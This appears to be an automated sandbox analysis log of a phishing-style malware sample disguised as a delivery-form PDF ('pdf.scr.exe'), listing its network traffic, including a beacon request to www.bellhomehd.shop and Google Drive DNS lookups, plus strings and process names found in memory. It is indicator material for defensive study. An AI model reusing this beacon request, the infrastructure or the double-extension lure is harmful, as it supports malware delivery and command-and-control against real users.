                      Source: global trafficHTTP traffic detected: GET /7l3h/?64S=LVahBLZpOHw0&ltuttt-X=6zLgQVJeSE3kO4Sf+RLctODToVrPhYaQ0c4BWNSIp+OQ9yx8H1ct7jyxXPxozjpZEa0Pz8J6l7jjf+e1lE7ZvAiUMQsmdIIWqY7TwFLSKhERhv9WS2Ztltg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.bellhomehd.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Source: global trafficDNS traffic detected: DNS query: drive.google.com
                      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                      Source: global trafficDNS traffic detected: DNS query: www.bellhomehd.shop
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818945720.0000000021E70000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1772442909.000000007EBFA000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.000000000251E000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.0000000020715000.00000004.00001000.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455010423.0000000000779000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2456357700.0000000004ACC000.00000004.10000000.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 00000013.00000000.2282511717.0000000002BFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2915059830.0000000036E6C000.00000004.80000000.00040000.00000000.sdmp, dxobknwL.pif.0.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818945720.0000000021E70000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1772442909.000000007EBFA000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.000000000251E000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.0000000020715000.00000004.00001000.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455010423.0000000000779000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2456357700.0000000004ACC000.00000004.10000000.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 00000013.00000000.2282511717.0000000002BFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2915059830.0000000036E6C000.00000004.80000000.00040000.00000000.sdmp, dxobknwL.pif.0.drString found in binary or memory: http://ocsp.comodoca.com0$
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, Lwnkboxd.PIF.0.drString found in binary or memory: http://programania.com/en.htm
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, Lwnkboxd.PIF.0.drString found in binary or memory: http://programania.com/en.zip
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, Lwnkboxd.PIF.0.drString found in binary or memory: http://programania.com/en_source.zip
